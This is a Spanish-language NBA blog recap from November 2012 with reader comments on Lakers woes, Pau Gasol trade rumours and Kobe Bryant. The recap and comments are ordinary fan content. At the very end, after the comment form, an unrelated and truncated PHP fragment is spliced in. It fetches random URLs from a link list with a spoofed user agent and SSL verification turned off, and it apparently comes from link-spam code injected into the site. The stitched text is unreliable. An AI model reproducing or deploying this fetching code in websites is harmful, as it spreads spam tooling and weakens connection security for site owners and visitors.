La Crónica: Nuevo esperpento en el Staples

28 de November de 2012 por TheDeerHunter

Hoy es uno de esos días en el que no envidio el asiento de lujo de Jack Nicholson. Triple doble de Kobe… si tenemos en cuenta las 10 pérdidas. Al menos él dio la cara. 0 de 6 Morris; 1 de 8 MWP; 2 de 9 Pau; 1 de 7 Antawn; 0 de 3 Duhon; 0 de 3 Meeks… Es que Kobe se tira demasiados tiros, por supuesto. Todo coronado por un fabuloso 3 de 12 en libres de “Ladrillos” Howard. Ante esto lo que parece increíble es que estuvieron a punto de forzar la prórroga en un horrendo empate a 77. Los Pacers no brillaron pero ni falta que les hizo. Buen partido de West y de Hill, que fue quién dio la puntilla a los locales (79-77).

El día de los pedrolos no termina aquí porque los Cavs también estuvieron finos ante su público. Comentábais en directo que “Pargo + Gee + Thompson + Miles + Zeller = 0 de 16 en tiros” en algún momento del partido y a pesar de eso los Suns no terminaban de rematar el choque. Varejao se comió a Gortat y Waiters cada día parece mejor jugador, pero uno de esos días en los que le da por jugar a Beasley, más el buen hacer habitual de Dragic y Scola apuntalaron la victoria (91-78).

Al menos sí disfrutamos de baloncesto del bueno en el resto de encuentros. Partido precioso en Houston contra Raptors, con hasta 12 hombres en dobles figuras (101-117). El mayor acierto en larga distancia le dio la victoria a los locales. Lo mejor de los canadienses fue Terrence Ross. Hay ganas de que ese chico comience a mostrar lo que sabe. 

En Sacramento Love la lió como sólo él sabe. El angelito anotó sólo 23, pero recogió un rebote más. El mago Adelman ahora se saca de la manga un escolta titular, Malcolm Lee, que no lo hizo mal. Queremos ver a Ricky ya (97-89).

Por último, bonito y emocionante choque en Philadelphia, en el regreso de Brand como visitante. El tipo se salió, pero sus ex-compañeros Holiday, Thaddeus y Turner están en un momento muy dulce. No fue el partido de Mayo y los Mavs echaron en falta una mayor aportación del perímetro (98-100).

PREMIOS

MVP: Llegar y besar el santo. Kevin Love ha vuelto a un nivel sublime aunque él diga que está lejos de su mejor forma. Ayer fueron 23 puntos y 24 rebotes.

Rookie: Se espera mucho de Terrence Ross en Toronto y ayer nos dejó su primer gran partido. Anotó 19 puntos y capturó 5 rebotes.

Sorpresa: En 19 minutos, Elton Brand dejó su tarjeta de visita a sus ex-compañeros de Philadelphia. 17 puntos, 8 rebotes, 1 robo y 1 tapón.

Decepción: Ver el box-score del partido de los Lakers es un ejercició de masoquismo. No hace falta repasar a los culpables, ya lo hemos hecho en la crónica.

Esfuerzo en vano: Si eres el único de tu equipo que lo intenta y te vas a los 40 puntos y 10 rebotes, te perdonamos las 10 pérdidas. Kobe Bryant no pudo hacer más anoche con todas las defensas centradas en él ante la inoperancia de sus compañeros.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

47 comentarios a esta entrada

  1. nba dice:
    #1

    Lo vuelvo a poner aqui el partido de Lakers vergonzoso no lo siguiente, que ya llevaban 2 dias de descanso
    Se busca equipo interesado en asumir contrato de alapivot español, gran conocimiento del juego, baja condicion fisica, subcampeon olimpico, campeon europeo , rookie of the year y barbudo para mas señas, razon los Lakers, preguntar por Kupchak

    Que creeis que pedirian los wolves por Derrick williams

      Citar

  2. Sancho88 dice:
    #2

    Pues sí, solo Kobe parece que estuvo a la altura. No obstante, me sigue pareciendo curioso como los aficionados laker siempre intentáis atizar al resto de jugadores para ensalzar a Kobe. Qué pasa, que ahora Pau y Howard son dos matados? No se debería plantear que no hay muchas cosas ensayadas en el ataque? El Kobe sistema ya nos lo sabemos, pero con eso no ganarán ningún título, igual solo llegan a segunda ronda como el año pasado. En serio, no hay un plan para hacer que el resto juegue a su nivel normal? El ego de Bryant es tan grande que hace parecer jugadores mediocres al resto? Entonces Houston, tenemos un problema. Si el objetivo es que un jugador sea el mejor, perfecto, perfecto. De hecho, vaya temporadón lleva Bryant. Pero si el objetivo es el sexto anillo, este no es el camino. No sé, Pau, Howard, Jamison o Artest (este sí está enchufado) son buenos o grandes jugadores. Es curioso lo poco que aportó la pintura laker ayer. Sin la pintura es imposible ganar ningún partido. Y ojo, que si Howard hubiera estado en sus números en TL, el partido de ayer no se hubiera escapado como bien comentas. Kobe hace milagros, pero él solo no puede ganar partidos. Algo tendrán que hacer para implicar al resto. Si hay que traspasar a Pau, adelante, pero es penoso ver cómo no hay ningún plan ensayado en partidos como este. Tan solo le dan la pelota a Bryant y que él decida, y el resto se pasan el último cuarto mirándose unos a otros y sintiéndose unos inútiles. Eso no es baloncesto. Ningún sistema real funciona dejandole la responsabilidad a un solo hombre. Ni en política, ni en deporte, ni en nada

      Citar

  3. GreenPride dice:
    #3

    Vaya desastre de los Lakers de nuevo. Si D’Antoni quería meter entre 110 y 115 puntos por partido ahora está más cerca de meterlos cada dos partidos que cada partido. Yo el principal problema lo veo en la utilización de los interiores al igual que sancho. Pau y Howard deberían dominar partidos y no se imponen a nadie. Esta es la gran ventaja laker y no la están aprovechando. Así desde luego no van a ningún lado. Hay que dar un tiempo a D’Antoni pero de momento no se ve mejoría

      Citar

  4. Viva_Dirk dice:
    #4

    Bueno Sancho, aun no he visto el partido de hoy, pero si he visto los otros 14. Ni con Brown ni con D’Antoni se le puede poner excusa alguna al rendimiento de ciertos jugadores. Por orden.

    Pau Gasol: Salvo anotar desde la media distancia con solvencia no esta haciendo nada de lo que sabe hacer. No tiene decisión en el poste bajo, saca montones de balones que deberian acabar con un tiro suyo a canasta y luego decimos que tira poco. En defensa mejor no decir nada, a dia de hoy out total y físicamente flojo.

    Dwight Howard: No está fisicamente ni al 50% de sus capacidades y su juego es puro físico, esta cogiendo 2.4 rebotes menos de lo que promedia en su carrera y un 10% peor en tiros libres. Hay momentos de los partidos en los que el plan es balon a Howard al poste bajo, y a dia de hoy no marca diferencias.

    Antawn Jamison: Es un jugador veterano y debe ir a mas, pero lleva un 25% en triples y de los 40 que ha tirado diria que ha tirado 30 absolutamente solo, eso no es culpa de nadie.

    Luego Kobe y MWP están haciendolo muy bien, en el caso de MWP esta físicamente mucho mejor que el año pasado y sabemos que no se corta tirando. Kobe, como caaaaada año llega en perfectas condiciones a principio de temporada, no se si será tan dificil pero solo unos pocos jugadores lo hacen cada año y Kobe es uno de ellos.

    El único jugador al que diria que se infrautilizó en un principio fue a Meeks, que desde que llegó D’Antoni tiene mas bola.

    Asi que, por lo visto hasta ahora y a la espera de que vuelva Nash, a Howard hay que darle algo mas de tiempo para que recupere su forma física tras la lesión de espalda y a Pau simplemente saber si va a seguir jugando como los 2 últimos años o quiere ganar otro anillo. Desde luego si esto no mejora bastante en un mes, lo veo fuera del equipo.

      Citar

  5. Vader dice:
    #5

    Eso, eso, la culpa es de Pau. Aquí en NY tenemos un 4 que le gusta jugar lejos del aro, con buen tiro de media distancia. Con Melo no juega muy bien pero su sintonía con Nash esta demostrada. Aceptamos Pau Gasol como moneda de cambio…

      Citar

  6. TheDeerHunter dice:
    #6

    Lo que a mí me parece… ya no curioso sino incomprensible, es que veladamente se le asigne a Kobe, al técnico o al empedrado la responsabilidad de las cagadas de todo quisqui.
    Kobe objetivamente está jugando como un Dios… y si quieres lo pones en duda. Es casi imposible hacerlo mejor. Al contrario el resto (salvo alguna excepción) lo está haciendo siendo suave como el culo, además de estar en un estado de forma absolutamente censurable.

    Ningún sistema funciona si los elementos no funcionan. De poco sirve encontrar un lanzador abierto si éste invariablemente la va a fallar. De paso la intimidación de “las torres gemelas” es el descojone padre, como toda la defensa, los desplazamientos laterales… y podríamos analizar el juego al poste y los balones interiores que tanto se cacarean, o cómo “aseguran” los rebotes. Vamos que me podría tirar enumerando defectos un buen rato.
    Pero vamos… que la evidencia no rompa el mantra de que Kobe es un chupón y no involucra a los compis (pobrecicos ellos)

    Pau está jugando con tendinitis…al menos ahora tenemos una excusa para no poner a parir lo lamentable que viene siendo su juego.

      Citar

  7. Laker1624 dice:
    #7

    Vader: Eso, eso, la culpa es de Pau. Aquí en NY tenemos un 4 que le gusta jugar lejos del aro, con buen tiro de media distancia. Con Melo no juega muy bien pero su sintonía con Nash esta demostrada. Aceptamos Pau Gasol como moneda de cambio…

    Buenas

    Fuera coñas ¿Como veriais un trade Pau-Amare?

      Citar

  8. Lanegan dice:
    #8

    Me encanta Pau, pero desde luego su situación ya huele. Lleva 3 años a un nivel de juego muy inferior a su potencial. Es muy completo y ha jugando una enorme carga de minutos con lo que ha mantenido unas estadísticas decentes, pero su implicación e impacto en el juego está a años luz de su potencial (y de su contrato). Hace 3 años fue por problemas “emocionales o sentimentales”, después era culpa de Brown que no sabía utilizarlo y, ¿ahora qué? Creo que ha perdido físico y motivación. Cómo dice Viva, nunca asume responsabilidades, sólo hace tiros abiertos, sino busca el pase. Ha dejado de ser una amenaza. No sé, pero es muy preocupante.

      Citar

  9. Sancho88 dice:
    #9

    Ok, pero creo que el debate debe ser: ¿Cómo van a ganar los partidos los Lakers sin usar a sus pívots?

    @Deer, si lees mi comentario verás que alabo el temporadón de Kobe. Solo digo que ante su presencia parece que el resto de jugadores se vienen abajo. Nada más. No le he llamado ni chupón, ni he criticado que se tire 28 tiros por partido, ni nada de eso.

    Pero la cuestión no es esa sino cómo tienen que jugar Lakers para ganar los partidos. Y llevo varios años esperando a que los acérrimos de L.A. deis una respuesta en este foro. Y aún sigo esperándola. Como mucho, lo máximo que os veo decir es que Kobe es dios y los demás son una mierda. Ok, si es esa vuestra respuesta, me la quedo, pero personalmente espero algo más…

      Citar

  10. TheDeerHunter dice:
    #10

    Para empezar la respuesta puede ser no tener tus dos primeros bases lesionados, motivando ratio de pérdidas terrible.

    Segundo que cada uno esté a su propia altura. Pau, Howard, Jamison, Meeks… son una sombra de si mismos. La simple mención de Kobe en que Jamison falle un carro de tiros solo, o que las torres gemelas no intimiden a nadie, o que nos quiten todos los rebotes ofensivos del mundo, o que los desplazamientos laterales sean de geriátrico… es tendencioso y falso.
    Podemos analizar muchas cuestiones, pero en realidad lo de los balones interiores es un mito. Howard recibe muchísimos, pero en su estado es inefectivo. Sus movimientos son nulos, en seguida le doblan defensas y si consigue encontrar el tiro le inflan a hachazos.
    Es cierto que Pau juega más alejado, como es de cajón teniendo a Howard… pero es muy falso que no lo pueda hacer bien ahí (que se fije en lo que hace su hermanito en Memphis, por ejemplo) o que nunca reciba balones al poste (que tampoco los aprovecha)

    Lo dicho. Que el personal esté en un estado de forma mínimamente exigible es lo mínimo. Si eso ya no se cumple otras consideraciones son inútiles.

      Citar

  11. futurman dice:
    #11

    Está claro que tienen que implicar en el juego a los pivots y obligarles a ser más agresivos. Es mejor perder partidos ahora por 5-15 en tiros para cada pivot y que así recuperen forma. También creo que deben encontrar un rotación que involucre a 8-9 jugadores sin bajar el nivel: Pau con Hill o con Jamison y Howard con el otro,

    Lo que no puede ser es que jueguen medio cascados tantos minutos por que solo se estropean más.

      Citar

  12. TheDeerHunter dice:
    #12

    Es que yo directamente me niego a creer que a estas alturas del curso sea una cuestión de desgaste. Es otro tipo de problema

      Citar

  13. Luis H. dice:
    #13

    Craso error sería que NY traspasara a Stoudamire. Necesita anotación bajo el aro, ya empieza a notar su falta. Y, sobre todo, necesita físico. Y en eso, STAT le gana a Gasol. También gente que genere ade+ de Melo. Me parecería un error ese traspaso. Me gustaría ver a Gasol en un equipo como los actuales Suns, creo que encajaría bien

      Citar

  14. Laker1624 dice:
    #14

    Luis H.: Craso error sería que NY traspasara a Stoudamire. Necesita anotación bajo el aro, ya empieza a notar su falta. Y, sobre todo, necesita físico. Y en eso, STAT le gana a Gasol. También gente que genere ade+ de Melo. Me parecería un error ese traspaso. Me gustaría ver a Gasol en un equipo como los actuales Suns, creo que encajaría bien

    Pero tambien es cierto que en NY no estan muy contentos con el rendimiento de Amare en lo que a la pasada campaña se refiere. Si cuando regrese de su lesion sigue sin convencer ni aportar lo que se espera de el al equipo creo que se lo pensarian. Pienso que Gasol podria aportar en todas las facetas en el juego interior de los Knicks y que se complementaria bien con un jugador como Chandler. La otra cuestion seria como encajaria Amare en LA ¿Seria el reencuentro con Nash y D’Antoni un factor para volver a ver el mejor Stat? Y en caso de que fuera asi ¿Seria un jugador valido para estos Lakers?

      Citar

  15. Ruxixón dice:
    #15

    El único momento en el que han funcionado los nuevos Lakers ha sido con un entrenador interino,ver para creer.Ni el del rol defensivo ni el de ahora con rol ofensivo han alejado la idea de que los Lakers son una banda poco conjuntada,ver para creer.Deseando ya que salga Pau de allí,ahora mismo las críticas son justas pero se olvidan de repartir las culpas entre todos los responsables y ahí parece que solo se centren en el 16 -no lo digo por vuestras opiniones en particular-,ya desde la temporada pasada.En fin,dice el periódico amarillista ese que empieza por M que habrá bandera blanca hasta que llegue Nash,pues a ver si llega ese día ya de una p…vez.

    Y bueno,no quería opinar sobre los Lakers y si por el estratosférico nivel del señor Anderson Varejao,el cual tiene números de MVP.Parece mentira que este jugador sea el que estuvo antaño en la ACB.Lo que dijo el entrenador de los Suns es verdad,Varejao está al nivel del mejor Rodman.Y aún tenemos recuperando a Love…vaya dos animalicos.

      Citar

  16. Esteban dice:
    #16

    ya lo dije y lo repito, los lakers necesitan traspasar a PAU, no porq sea malo, pero es necesario, es tan bueno que conseguiran algo por el, y los lakers necesitan profundidad

    pau x galinari, chandler y mozgov no tiene sentido?

    pau x bargani y calderon?

      Citar

  17. Esteban dice:
    #17

    Ruxixón: ya dos animalicos.

    q verdadero desperdicio varejao en este nivel jugando para los CAVS, bien le vendri a portland… habria que ver si estos estas dispuestos a dar a Leonard y que mas
    Mavs tambien seria un buen destino,. NI HABLAR DE MIAMI

      Citar

  18. nba dice:
    #18

    Puff Esteban no creo que Denver trague con eso, aunque estaria bien.
    Lo de Pau tiene facil solucion, que no salga de titular hasta que no se lo merezca, ya vereis como espabila…

      Citar

  19. Esteban dice:
    #19

    No? Seria muy bueno para denver, chander y mozgov ni juegan y gallo no esta a la altura de lo esperado desde los PO pasados
    Con pau saltan a una potencia junto a andre y lawson

      Citar

  20. elreylagarto dice:
    #20

    Soy de Lakers y TENGO MIEDO, MUCHO MIEDO.

      Citar

  21. Laker1624 dice:
    #21

    elreylagarto: Soy de Lakers y TENGO MIEDO, MUCHO MIEDO.

    Ya somos dos

    A este paso me conformo con la ultima plaza de playoffs…

      Citar

  22. Txusma dice:
    #22

    Hace unos días os propusimos elegir entre Pau y Marc Gasol y la respuesta parecía unánime… 😉

      Citar

  23. Esteban dice:
    #23

    Txusma:
    Hace unos días os propusimos elegir entre Pau y Marc Gasol y la respuesta parecía unánime…

    pero la pregunta no era al dia de hoy, sino como jugaores en la carrera completa

    igualmente, yo al dia de hoy me quedo con pau, YA LO DIJE, esta en un ambiente poco aconsajable para el, de entro puro en otro equipo (atlanta?) podria demostrar lo que vale

      Citar

  24. Sancho88 dice:
    #24

    Creo que la pregunta sí era por el momento actual… yo dije Marc, jeejej.

    Y tb. dije Terrence Ross hace unas semanas.

    Viva mi oportunismo.

      Citar

  25. txusma dice:
    #25

    Esteban: pero la pregunta no era al dia de hoy, sino como jugaores en la carrera completa

    Veo que no leiste bien la pregunta… 😀

      Citar

  26. melo15 dice:
    #26

    Ahora me acuerdo quien dijo que Ross podia mejorar, cuando salga mi analisis de Rookies vais a flipar!

      Citar

  27. Ruxixón dice:
    #27

    Ponerme una medallita por Ross que en el análisis del equipo de los Raptors yo lo ponía de titular en el quinteto y sentaba a LaZorra.Mirar,mirar xDD

      Citar

  28. Esteban dice:
    #28

    Ross tiene buena buena pinta, pero vamos q no es una gran sorpresa, creo q fue pick 6 no pick 22, incluso fue elegido por sobre barnes,
    A ver se sabia q tenia potencial

    Yo me he equivocado y mal con waiters quien para mi no valia nada, y esta demostrando mucho, aun sin irving

    Hablando de irving, lesion fuerte en la NCAA, muchas lesiones el año pasada y mas lesiones este año, es un tio de cristal! Q gran pena!!!

      Citar

  29. melo15 dice:
    #29

    Terrence Ross fue escogido en la 9 posicion y fue una gran sopresa, se especulava que saldria en la 14-16, pero al final Toronto nos sorprendio escogiendolo antes.
    No se porque opinais que Waiter esta haciendo una gran temporada, a mi personalmente no me esta gustan tanto, esta en 15pp pero con porcentajes malisimos y tirandose 20 tiros por noche, de la defensa y eso no se, pero no puede tirar tanto.

      Citar

  30. Vader dice:
    #30

    Rumor a la vista sobre Pau, iria a Wolves… y recibirian sobretodo a Ariza y D.Williams… poco me parece…

      Citar

  31. melo15 dice:
    #31

    El traspaso creo que es asi: Pau se va a los Timberwoves junto a Vasely , Pekovic, Ariza y Barea a Los Angeles, Derrick Williams se va a Washington.

      Citar

  32. simon dice:
    #32

    Pues ese traspaso no me gusta nada para ninguna de las partes, quizas para Minny y para Pau en concreto tb pues ahi podría jugar de 5 y con espacios que le dejaría Love. No creo que se haga.

      Citar

  33. Viva_Dirk dice:
    #33

    Me parece un traspaso raro.

    – Lakers recibe un excelente jugador de banco como Barea que le vendria genial. Hasta ahí lo que cuadra del traspaso. Ariza no puede jugar de 4 y MWP tampoco, además Ariza ya no es Mr.Energy que era cuando se fue de Lakers. Mas de lo mismo con Pekovic, no puede jugar de 4 ni Howard tampoco. Si no es un traspaso puente no tiene sentido. Si después viniera algo como Pekovic+Ariza por Gooden+Dunleavy por ejemplo, tendria sentido.

    – Timberwolves, fichan a Pau ¿para jugar de center? Si esa es la idea igual se dan cuenta de que hace siglos que Pau no ataca el poste bajo como deberia, aunque vaya desde luego es una gran apuesta. De Vesely cualquier cosa que vaya saliendo les vale.

    – Wizars: Vesely+Ariza por Derrick Williams me parece un movimiento tremendo, sin duda los grandes ganadores, podrian darle a Derrick mucha bola para ver si de verdad puede ser una estrella de la liga, y sientan una base jovencísima llena de talento con Wall-Beal-Williams, con veteranos que pueden ir ayudando a ganar partidos como Nene y otro puñado de jovenes con ganas de demostrar cosas como Crawford, Seraphin y Booker.

      Citar

  34. melo15 dice:
    #34

    Ya he dicho que no se si es asi, es con estos jugadores casi seguro pero alomejor estan intercanviados.

      Citar

  35. melo15 dice:
    #35

    Version oficial del traspaso:
    Lakers recibe: Chris Singleton, Trevor Ariza, Luke Ridnour y J.J.Barea.
    Timberwolves recibe: Pau Gasol, el pick de los Wizards del proximo año y Jan Vasely.
    Wizards recibe: Derrick Williams, Duhon y Nikola Pekovic.
    Los Wizards tendrian equipazo de PO.

      Citar

  36. Esteban dice:
    #36

    melo15:
    Version oficial del traspaso:
    Lakers recibe: Chris Singleton, Trevor Ariza, Luke Ridnour y J.J.Barea.
    Timberwolves recibe: Pau Gasol, el pick de los Wizards del proximo año y Jan Vasely.
    Wizards recibe: Derrick Williams, Duhon y Nikola Pekovic.
    Los Wizards tendrian equipazo de PO.

    no puede ser cierto, dios, PAU NO VALE TAN POCO

    es un regao, barea es muy necesario en los lakers, no asi ridnur, ariza ni sigleton, ademas de quedarse sin un 4 titular, NO ME LO TRAGO

    timberwolves van a por todo YA, pau no podra ser gasol de centro, pero te aseguro que mejora a pekovic, y con love al lado, ojo que no vayan a por el titulo, que dupla hermosa, LOVE CANDIDATO AL MVP en ese equipo

    bien los wizards, consiguen a pekovic para jugar con NENE y a williams como alero titular sin entregar NADA! a vasely que a sido un fiasco y a ariza y sus contratazo…

    la verdad, no cierra

      Citar

  37. Esteban dice:
    #37

    egún la información de este periodista, se estaría negociando un traspaso a cuatro bandas y el español Pau Gasol sería el principal implicado. El ala-pívot de los Lakers se marcharía a los Timberwolves, que también recibirían a Kim English, escolta procedente de los Detroit Pistons.

    A los Lakers, por su parte, llegarían Derrick Williams y J.J. Barea (ala-pívot y base de los Wolves), el alero Trevor Ariza (que volvería a casa procedente de los Washington Wizards) y Jonas Jerebko (escolta de los Pistons que hace una temporada estuvo en la órbita del Real Madrid).

    En los Wizards, el equipo de la capital, desembarcarían el pívot dominicano Charlie Villanueva (de los Pistons), Nikola Pekovic (pívot de los Wolves) y Chris Duhon (base de los Lakers).

    Los Detroit Pistons, último equipo implicado, se harían con los servicios del hombre alto Emeka Okafor (procedente de los Wizards de Randy Wittman), cuya llegada supondría el segundo traspaso del pívot en el mismo año, después de llegar a la capital el pasado verano.

      Citar

  38. Esteban dice:
    #38

    esto tendria algo mas de sentido, para los lakers al menos, consigue dos 4, un base suplente revulsivo y un alero capaz de entrar en la rotacion cmo ariza… asi saldrian bastante bien parados

    para minesota tamb estaria bien con la llegada de gasol, sin desarmarse tanto, pierden a barea a quien no reemplazan, pero con kirilenko y budinger no van a extrañar a williams y con gasol no van a extrañar a pekovic

    wizards, sale hecho, consiguen un buen pivot y poco mas, pero salen de okafor, es todo un logro

    detroit, no se entiende su movimiento, pues podrian amnistiar a villanueva y a okafor no

      Citar

  39. melo15 dice:
    #39

    Pues yo lo he sacado de NBA.com asi que supongo que seria cierto. Pero solo son suposiciones.

      Citar

  40. Simón dice:
    #40

    melo15:
    Version oficial del traspaso:
    Lakers recibe: Chris Singleton, Trevor Ariza, Luke Ridnour y J.J.Barea.
    Timberwolves recibe: Pau Gasol, el pick de los Wizards del proximo año y Jan Vasely.
    Wizards recibe: Derrick Williams, Duhon y Nikola Pekovic.
    Los Wizards tendrian equipazo de PO.

    Ese traspaso no tiene ni pies ni cabeza.
    Lakers no va a traspasar a Pau por 4 medianias de banquillo y menos para quedarse con un juego interior que seria Howard, Hill, Jamison y Sacre. muy muy flojo. y solo tiene un tio capaz de tirar de media distancia en el juego interior. Ariza aportaría buenos minutos pero no mejoraría en exceso a MWP y se solaparían bastante. Barea pues si podría ejercer de microondas y Ridnour pues es buen base y ayudaría mucho a descargar de minutos a Nash pero es un defensor muy flojito tambien asi que no creo que encaje ni sea el base ideal para suplir a Nash.
    Para Timberwolves si es como comentas y el traspaso llevaria a Wolves el pick de Wizards para el año que viene sería un super trade para ellos pues ese pick tiene pinta de numero 1. ( Supongo que será algun otro pick que tendra wizards por ahi ). El cuarteto Rubio, Kirilenko, Love, y Pau. Sería una coña + lo que pudieran piyar con ese supuesto pick sería la leche.
    Para Wizards… ni fu ni fa los mejoraría el traspaso bastante pero no se, no termino de verlo y menos si se desprenden de su pick para el año que viene. Seguiría siendo un equipo con mucho potencial que se quedaría en eso, en potencial, pues Nené no creo que sea el adecuado para hacerlos crecer y Okafor no es que sea un ejemplo precisamente…
    Pero vamos que no creo que Lakers se desprenda de Pau por tan poco.

      Citar

  41. HisRoyalAirness dice:
    #41

    Ese trade está desmentidísimo desde hace horas, ha sido sólo una elucubración de David Aldridge

      Citar

  42. melo15 dice:
    #42

    Bueno yo lo lei ayer y me sorprendio y como Vader ha puesto aquello de Derrick Williams pues me he acordado. Yo tampoco le veía mucho sentido la verdad.

      Citar

  43. HisRoyalAirness dice:
    #43

    Por cierto, os pongáis como os pongáis, que Kobe se tire los mismos tiros que el resto del quinteto titular es una barbaridad.
    Siempre que termina haciendo eso un partido (en los últimos 6 años) los Lakers pierden.
    Ser un lider es mucho más que monopolizar el último cuarto

      Citar

  44. Pop dice:
    #44

    HisRoyalAirness:
    Por cierto, os pongáis como os pongáis, que Kobe se tire los mismos tiros que el resto del quinteto titular es una barbaridad.
    Siempre que termina haciendo eso un partido (en los últimos 6 años) los Lakers pierden.
    Ser un lider es mucho más que monopolizar el último cuarto

    Yo soy de los que normalmente le he metido cera a Kobe o a L.A. por eso, pero este año me lo estoy pensando. Primero, porque tiene un 50%, no como antes. Segundo, y principalmente, porque creo que la relación causa-efecto es al revés en esta temporada: los L.A. no pierden cuando juegan al Kobe sistema, sino que cuando van perdiendo (principalmente porque este año sus compañeros están cuajados) es cuando Kobe intenta la heróica.

      Citar

  45. HisRoyalAirness dice:
    #45

    Pop: Yo soy de los que normalmente le he metido cera a Kobe o a L.A. por eso, pero este año me lo estoy pensando. Primero, porque tiene un 50%, no como antes. Segundo, y principalmente, porque creo que la relación causa-efecto es al revés en esta temporada: los L.A. no pierden cuando juegan al Kobe sistema, sino que cuando van perdiendo (principalmente porque este año sus compañeros están cuajados) es cuando Kobe intenta la heróica.

    Pero es que la heróica es intrascendente. Algunos lo llaman “maquillar las estadísticas”.

    Sí, está muy acertado pero es que parece que es el único que quiere seguir en sus números a costa de todo.
    Solo no va a ganar, debería saberlo mejor que nadie.

      Citar

  46. TheDeerHunter dice:
    #46

    Juro que no he visto maquillar a Kobe en mi vida. Lo único que se le puede reprochar es intentar ganar por encima de demasiadas cosas y lanzarse contra aspas de molinos… pero nunca maquillaje.

    Lo que pasa es que a los demás se les debería de caer la cara de vergüenza por ver a Kobe con gripe matándose, y haciendo todo para ganar, y nadie a su alrededor dando un paso adelante. LIDERAZGO en mayúsculas, siempre que haya algo sobre lo que liderar. El resto son ahora mismo lo que vimos. No hay más.

    De no ser por un Kobe a nivel top5 de la liga hasta ahora no hubiera habido más que palizas en contra. Con Nash y Blake lesionados y el estado en que se encuentran esencialmente todos (excepto MWP, Hill y el propio Kobe) es un equipo muy del montón para los objetivos que se persiguen. No hay sistema que valga.

    Me resulta alucinante que Kobe esté jugando a este nivel y se busquen las críticas más imaginativas del mundo, simplemente para ocultar los deméritos ajenos a él. Primero la responsabilidad a cada uno… y luego hablamos de otras cosas. Me pregunto qué tipo de liderazgo tendrá que ejercer Kobe para que a Pau no le quiten los rebotes literalmente de las manos, como si fuera un jugador de cuarta fila. Esa es la triste realidad.

    Parece que algunos somos anti-Pau. Simplemente le exigimos un nivel acorde a su talento… obviamente cada día que pasa eso es más demasiado pedir. Ójala me equivoque.

      Citar

  47. nba dice:
    #47

    Amen Deer, de acuerdo en todo lo dicho

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>